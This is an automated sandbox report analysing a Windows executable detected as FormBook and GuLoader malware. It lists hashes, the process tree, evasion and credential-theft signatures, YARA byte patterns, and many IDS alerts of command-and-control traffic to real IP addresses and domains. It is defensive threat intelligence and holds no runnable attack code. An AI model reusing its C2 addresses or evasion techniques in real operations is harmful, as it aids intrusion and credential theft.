Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
presupuesto urgente.exe

Overview

General Information

Sample name:presupuesto urgente.exe
Analysis ID:1525571
MD5:8ae672783481c0b46780431bfce5a216
SHA1:ace989f4c2a82f48cc3167e531ab13d2999537b2
SHA256:5e279ef4c54dfc525f423b98054f37ee6eb51a71e8c1f76d5438393055442173
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64native
  • presupuesto urgente.exe (PID: 8128 cmdline: "C:\Users\user\Desktop\presupuesto urgente.exe" MD5: 8AE672783481C0B46780431BFCE5A216)
    • presupuesto urgente.exe (PID: 6412 cmdline: "C:\Users\user\Desktop\presupuesto urgente.exe" MD5: 8AE672783481C0B46780431BFCE5A216)
      • qnFwqCOYxcUlZ.exe (PID: 1136 cmdline: "C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • winrs.exe (PID: 2332 cmdline: "C:\Windows\SysWOW64\winrs.exe" MD5: E6C1CE56E6729A0B077C0F2384726B30)
          • firefox.exe (PID: 2460 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000004.00000002.12649287914.0000000003010000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.12649287914.0000000003010000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2aa20:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13faf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000002.00000002.8372536747.00000000331E0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.8372536747.00000000331E0000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2aa20:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13faf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000003.00000002.12650331699.00000000013B0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries
        No Sigma rule has matched
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-04T11:57:17.645384+020028032702Potentially Bad Traffic192.168.11.2049730142.251.40.174443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-04T11:58:03.329695+020028554651A Network Trojan was detected192.168.11.204973291.195.240.1980TCP
        2024-10-04T11:58:27.063852+020028554651A Network Trojan was detected192.168.11.2049736185.134.245.11380TCP
        2024-10-04T11:58:40.382196+020028554651A Network Trojan was detected192.168.11.2049740184.73.212.5180TCP
        2024-10-04T11:58:54.104418+020028554651A Network Trojan was detected192.168.11.2049744199.192.19.1980TCP
        2024-10-04T11:59:07.622670+020028554651A Network Trojan was detected192.168.11.204974813.248.169.4880TCP
        2024-10-04T11:59:22.696493+020028554651A Network Trojan was detected192.168.11.204975243.252.167.18880TCP
        2024-10-04T11:59:42.269475+020028554651A Network Trojan was detected192.168.11.204975631.217.192.15880TCP
        2024-10-04T11:59:55.826713+020028554651A Network Trojan was detected192.168.11.2049760191.101.104.16480TCP
        2024-10-04T12:00:09.132400+020028554651A Network Trojan was detected192.168.11.2049764162.255.119.15080TCP
        2024-10-04T12:00:30.935743+020028554651A Network Trojan was detected192.168.11.204976891.195.240.1980TCP
        2024-10-04T12:00:46.653352+020028554651A Network Trojan was detected192.168.11.204977246.102.130.11680TCP
        2024-10-04T12:01:16.659293+020028554651A Network Trojan was detected192.168.11.204977691.195.240.1980TCP
        2024-10-04T12:01:38.295267+020028554651A Network Trojan was detected192.168.11.204978091.195.240.1980TCP
        2024-10-04T12:01:51.854813+020028554651A Network Trojan was detected192.168.11.2049784185.134.245.11380TCP
        2024-10-04T12:02:04.941213+020028554651A Network Trojan was detected192.168.11.2049788184.73.212.5180TCP
        2024-10-04T12:02:18.453635+020028554651A Network Trojan was detected192.168.11.2049792199.192.19.1980TCP
        2024-10-04T12:02:31.734635+020028554651A Network Trojan was detected192.168.11.204979613.248.169.4880TCP
        2024-10-04T12:02:45.882628+020028554651A Network Trojan was detected192.168.11.204980043.252.167.18880TCP
        2024-10-04T12:03:01.172727+020028554651A Network Trojan was detected192.168.11.204980431.217.192.15880TCP
        2024-10-04T12:03:14.253639+020028554651A Network Trojan was detected192.168.11.2049808191.101.104.16480TCP
        2024-10-04T12:03:27.416313+020028554651A Network Trojan was detected192.168.11.2049812162.255.119.15080TCP
        2024-10-04T12:03:57.373971+020028554651A Network Trojan was detected192.168.11.204981691.195.240.1980TCP
        2024-10-04T12:04:10.558718+020028554651A Network Trojan was detected192.168.11.2049820172.66.44.7380TCP
        2024-10-04T12:04:24.340549+020028554651A Network Trojan was detected192.168.11.2049824193.108.130.2380TCP
        2024-10-04T12:04:29.755684+020028554651A Network Trojan was detected192.168.11.204982574.208.236.22580TCP
        2024-10-04T12:04:40.249445+020028554651A Network Trojan was detected192.168.11.204982691.195.240.1980TCP
        2024-10-04T12:04:45.648521+020028554651A Network Trojan was detected192.168.11.2049827185.134.245.11380TCP
        2024-10-04T12:04:50.872277+020028554651A Network Trojan was detected192.168.11.2049828184.73.212.5180TCP
        2024-10-04T12:04:57.558078+020028554651A Network Trojan was detected192.168.11.2049829199.192.19.1980TCP
        2024-10-04T12:05:02.965053+020028554651A Network Trojan was detected192.168.11.204983013.248.169.4880TCP
        2024-10-04T12:05:08.587904+020028554651A Network Trojan was detected192.168.11.204983143.252.167.18880TCP
        2024-10-04T12:05:14.458837+020028554651A Network Trojan was detected192.168.11.204983231.217.192.15880TCP
        2024-10-04T12:05:20.342733+020028554651A Network Trojan was detected192.168.11.2049833191.101.104.16480TCP
        2024-10-04T12:05:25.578613+020028554651A Network Trojan was detected192.168.11.2049834162.255.119.15080TCP
        2024-10-04T12:05:41.309214+020028554651A Network Trojan was detected192.168.11.204983591.195.240.1980TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-04T11:56:21.886022+020028554641A Network Trojan was detected192.168.11.204981591.195.240.1980TCP
        2024-10-04T11:56:21.886022+020028554641A Network Trojan was detected192.168.11.204974713.248.169.4880TCP
        2024-10-04T11:56:21.886022+020028554641A Network Trojan was detected192.168.11.204977991.195.240.1980TCP
        2024-10-04T11:56:21.886022+020028554641A Network Trojan was detected192.168.11.204979513.248.169.4880TCP
        2024-10-04T11:58:18.917234+020028554641A Network Trojan was detected192.168.11.2049733185.134.245.11380TCP
        2024-10-04T11:58:21.626476+020028554641A Network Trojan was detected192.168.11.2049734185.134.245.11380TCP
        2024-10-04T11:58:24.346707+020028554641A Network Trojan was detected192.168.11.2049735185.134.245.11380TCP
        2024-10-04T11:58:32.494751+020028554641A Network Trojan was detected192.168.11.2049737184.73.212.5180TCP
        2024-10-04T11:58:35.129447+020028554641A Network Trojan was detected192.168.11.2049738184.73.212.5180TCP
        2024-10-04T11:58:37.752767+020028554641A Network Trojan was detected192.168.11.2049739184.73.212.5180TCP
        2024-10-04T11:58:45.962685+020028554641A Network Trojan was detected192.168.11.2049741199.192.19.1980TCP
        2024-10-04T11:58:48.664928+020028554641A Network Trojan was detected192.168.11.2049742199.192.19.1980TCP
        2024-10-04T11:58:51.398863+020028554641A Network Trojan was detected192.168.11.2049743199.192.19.1980TCP
        2024-10-04T11:58:59.739044+020028554641A Network Trojan was detected192.168.11.204974513.248.169.4880TCP
        2024-10-04T11:59:02.371082+020028554641A Network Trojan was detected192.168.11.204974613.248.169.4880TCP
        2024-10-04T11:59:14.156696+020028554641A Network Trojan was detected192.168.11.204974943.252.167.18880TCP
        2024-10-04T11:59:17.018828+020028554641A Network Trojan was detected192.168.11.204975043.252.167.18880TCP
        2024-10-04T11:59:19.836896+020028554641A Network Trojan was detected192.168.11.204975143.252.167.18880TCP
        2024-10-04T11:59:34.103136+020028554641A Network Trojan was detected192.168.11.204975331.217.192.15880TCP
        2024-10-04T11:59:36.967467+020028554641A Network Trojan was detected192.168.11.204975431.217.192.15880TCP
        2024-10-04T11:59:39.617333+020028554641A Network Trojan was detected192.168.11.204975531.217.192.15880TCP
        2024-10-04T11:59:48.483360+020028554641A Network Trojan was detected192.168.11.2049757191.101.104.16480TCP
        2024-10-04T11:59:51.100049+020028554641A Network Trojan was detected192.168.11.2049758191.101.104.16480TCP
        2024-10-04T11:59:53.725946+020028554641A Network Trojan was detected192.168.11.2049759191.101.104.16480TCP
        2024-10-04T12:00:01.206635+020028554641A Network Trojan was detected192.168.11.2049761162.255.119.15080TCP
        2024-10-04T12:00:03.852161+020028554641A Network Trojan was detected192.168.11.2049762162.255.119.15080TCP
        2024-10-04T12:00:06.493041+020028554641A Network Trojan was detected192.168.11.2049763162.255.119.15080TCP
        2024-10-04T12:00:22.827350+020028554641A Network Trojan was detected192.168.11.204976591.195.240.1980TCP
        2024-10-04T12:00:25.530093+020028554641A Network Trojan was detected192.168.11.204976691.195.240.1980TCP
        2024-10-04T12:00:28.232417+020028554641A Network Trojan was detected192.168.11.204976791.195.240.1980TCP
        2024-10-04T12:00:38.135471+020028554641A Network Trojan was detected192.168.11.204976946.102.130.11680TCP
        2024-10-04T12:00:40.964259+020028554641A Network Trojan was detected192.168.11.204977046.102.130.11680TCP
        2024-10-04T12:00:43.805558+020028554641A Network Trojan was detected192.168.11.204977146.102.130.11680TCP
        2024-10-04T12:01:08.549229+020028554641A Network Trojan was detected192.168.11.204977391.195.240.1980TCP
        2024-10-04T12:01:11.253810+020028554641A Network Trojan was detected192.168.11.204977491.195.240.1980TCP
        2024-10-04T12:01:13.957598+020028554641A Network Trojan was detected192.168.11.204977591.195.240.1980TCP
        2024-10-04T12:01:30.187290+020028554641A Network Trojan was detected192.168.11.204977791.195.240.1980TCP
        2024-10-04T12:01:32.889888+020028554641A Network Trojan was detected192.168.11.204977891.195.240.1980TCP
        2024-10-04T12:01:43.691054+020028554641A Network Trojan was detected192.168.11.2049781185.134.245.11380TCP
        2024-10-04T12:01:46.408402+020028554641A Network Trojan was detected192.168.11.2049782185.134.245.11380TCP
        2024-10-04T12:01:49.130249+020028554641A Network Trojan was detected192.168.11.2049783185.134.245.11380TCP
        2024-10-04T12:01:57.074401+020028554641A Network Trojan was detected192.168.11.2049785184.73.212.5180TCP
        2024-10-04T12:01:59.690855+020028554641A Network Trojan was detected192.168.11.2049786184.73.212.5180TCP
        2024-10-04T12:02:02.318924+020028554641A Network Trojan was detected192.168.11.2049787184.73.212.5180TCP
        2024-10-04T12:02:10.337070+020028554641A Network Trojan was detected192.168.11.2049789199.192.19.1980TCP
        2024-10-04T12:02:13.048970+020028554641A Network Trojan was detected192.168.11.2049790199.192.19.1980TCP
        2024-10-04T12:02:15.751004+020028554641A Network Trojan was detected192.168.11.2049791199.192.19.1980TCP
        2024-10-04T12:02:23.858692+020028554641A Network Trojan was detected192.168.11.204979313.248.169.4880TCP
        2024-10-04T12:02:26.487228+020028554641A Network Trojan was detected192.168.11.204979413.248.169.4880TCP
        2024-10-04T12:02:37.373667+020028554641A Network Trojan was detected192.168.11.204979743.252.167.18880TCP
        2024-10-04T12:02:40.228351+020028554641A Network Trojan was detected192.168.11.204979843.252.167.18880TCP
        2024-10-04T12:02:43.042666+020028554641A Network Trojan was detected192.168.11.204979943.252.167.18880TCP
        2024-10-04T12:02:51.905752+020028554641A Network Trojan was detected192.168.11.204980131.217.192.15880TCP
        2024-10-04T12:02:54.851294+020028554641A Network Trojan was detected192.168.11.204980231.217.192.15880TCP
        2024-10-04T12:02:57.669541+020028554641A Network Trojan was detected192.168.11.204980331.217.192.15880TCP
        2024-10-04T12:03:06.873312+020028554641A Network Trojan was detected192.168.11.2049805191.101.104.16480TCP
        2024-10-04T12:03:09.005119+020028554641A Network Trojan was detected192.168.11.2049806191.101.104.16480TCP
        2024-10-04T12:03:11.627524+020028554641A Network Trojan was detected192.168.11.2049807191.101.104.16480TCP
        2024-10-04T12:03:19.496600+020028554641A Network Trojan was detected192.168.11.2049809162.255.119.15080TCP
        2024-10-04T12:03:22.136818+020028554641A Network Trojan was detected192.168.11.2049810162.255.119.15080TCP
        2024-10-04T12:03:24.778448+020028554641A Network Trojan was detected192.168.11.2049811162.255.119.15080TCP
        2024-10-04T12:03:49.267450+020028554641A Network Trojan was detected192.168.11.204981391.195.240.1980TCP
        2024-10-04T12:03:51.968740+020028554641A Network Trojan was detected192.168.11.204981491.195.240.1980TCP
        2024-10-04T12:04:02.687005+020028554641A Network Trojan was detected192.168.11.2049817172.66.44.7380TCP
        2024-10-04T12:04:05.312581+020028554641A Network Trojan was detected192.168.11.2049818172.66.44.7380TCP
        2024-10-04T12:04:07.935355+020028554641A Network Trojan was detected192.168.11.2049819172.66.44.7380TCP
        2024-10-04T12:04:16.613852+020028554641A Network Trojan was detected192.168.11.2049821193.108.130.2380TCP
        2024-10-04T12:04:19.640390+020028554641A Network Trojan was detected192.168.11.2049822193.108.130.2380TCP
        2024-10-04T12:04:21.785557+020028554641A Network Trojan was detected192.168.11.2049823193.108.130.2380TCP

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: presupuesto urgente.exeAvira: detected
        Source: www.297tamatest1kb.comVirustotal: Detection: 8%Perma Link
        Source: www.gipsytroya.comVirustotal: Detection: 9%Perma Link
        Source: presupuesto urgente.exeReversingLabs: Detection: 18%
        Source: presupuesto urgente.exeVirustotal: Detection: 22%Perma Link
        Source: Yara matchFile source: 00000004.00000002.12649287914.0000000003010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.8372536747.00000000331E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.12650331699.00000000013B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.12651774675.0000000003A80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.12651169047.00000000036E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.12651069125.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.8373636229.0000000034250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: presupuesto urgente.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 142.251.40.174:443 -> 192.168.11.20:49730 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.250.176.193:443 -> 192.168.11.20:49731 version: TLS 1.2
        Source: presupuesto urgente.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: winrs.pdbGCTL source: presupuesto urgente.exe, 00000002.00000003.8323727937.0000000003598000.00000004.00000020.00020000.00000000.sdmp, qnFwqCOYxcUlZ.exe, 00000003.00000003.8423230370.00000000012D1000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: presupuesto urgente.exe, 00000002.00000001.8031630233.0000000000649000.00000020.00000001.01000000.00000007.sdmp
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: qnFwqCOYxcUlZ.exe, 00000003.00000002.12649228198.000000000058E000.00000002.00000001.01000000.0000000B.sdmp
        Source: Binary string: wntdll.pdbUGP source: presupuesto urgente.exe, 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8266535897.0000000033358000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8263145257.00000000331A3000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000002.12651416729.0000000003900000.00000040.00001000.00020000.00000000.sdmp, winrs.exe, 00000004.00000002.12651416729.0000000003A2D000.00000040.00001000.00020000.00000000.sdmp, winrs.exe, 00000004.00000003.8358482622.000000000374C000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000003.8355000605.0000000003593000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: presupuesto urgente.exe, presupuesto urgente.exe, 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8266535897.0000000033358000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8263145257.00000000331A3000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000002.12651416729.0000000003900000.00000040.00001000.00020000.00000000.sdmp, winrs.exe, 00000004.00000002.12651416729.0000000003A2D000.00000040.00001000.00020000.00000000.sdmp, winrs.exe, 00000004.00000003.8358482622.000000000374C000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000003.8355000605.0000000003593000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: winrs.pdb source: presupuesto urgente.exe, 00000002.00000003.8323727937.0000000003598000.00000004.00000020.00020000.00000000.sdmp, qnFwqCOYxcUlZ.exe, 00000003.00000003.8423230370.00000000012D1000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: presupuesto urgente.exe, 00000002.00000001.8031630233.0000000000649000.00000020.00000001.01000000.00000007.sdmp
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 0_2_004066F3 FindFirstFileW,FindClose,0_2_004066F3
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 0_2_00405ABE CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405ABE
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 0_2_00402862 FindFirstFileW,0_2_00402862

        Networking

        barindex
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49733 -> 185.134.245.113:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49732 -> 91.195.240.19:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49738 -> 184.73.212.51:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49744 -> 199.192.19.19:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49736 -> 185.134.245.113:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49743 -> 199.192.19.19:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49752 -> 43.252.167.188:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49755 -> 31.217.192.158:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49741 -> 199.192.19.19:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49758 -> 191.101.104.164:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49742 -> 199.192.19.19:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49766 -> 91.195.240.19:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49734 -> 185.134.245.113:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49761 -> 162.255.119.150:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49750 -> 43.252.167.188:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49762 -> 162.255.119.150:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49764 -> 162.255.119.150:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49775 -> 91.195.240.19:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49735 -> 185.134.245.113:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49749 -> 43.252.167.188:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49769 -> 46.102.130.116:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49778 -> 91.195.240.19:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49768 -> 91.195.240.19:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49751 -> 43.252.167.188:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49753 -> 31.217.192.158:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49781 -> 185.134.245.113:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49792 -> 199.192.19.19:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49737 -> 184.73.212.51:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49780 -> 91.195.240.19:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49739 -> 184.73.212.51:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49760 -> 191.101.104.164:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49770 -> 46.102.130.116:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49785 -> 184.73.212.51:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49791 -> 199.192.19.19:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49740 -> 184.73.212.51:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49745 -> 13.248.169.48:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49783 -> 185.134.245.113:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49794 -> 13.248.169.48:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49801 -> 31.217.192.158:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49787 -> 184.73.212.51:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49767 -> 91.195.240.19:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49754 -> 31.217.192.158:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49746 -> 13.248.169.48:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49805 -> 191.101.104.164:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49809 -> 162.255.119.150:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49798 -> 43.252.167.188:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49788 -> 184.73.212.51:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49748 -> 13.248.169.48:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49756 -> 31.217.192.158:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49807 -> 191.101.104.164:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49817 -> 172.66.44.73:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49771 -> 46.102.130.116:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49814 -> 91.195.240.19:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49757 -> 191.101.104.164:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49797 -> 43.252.167.188:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49799 -> 43.252.167.188:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49772 -> 46.102.130.116:80
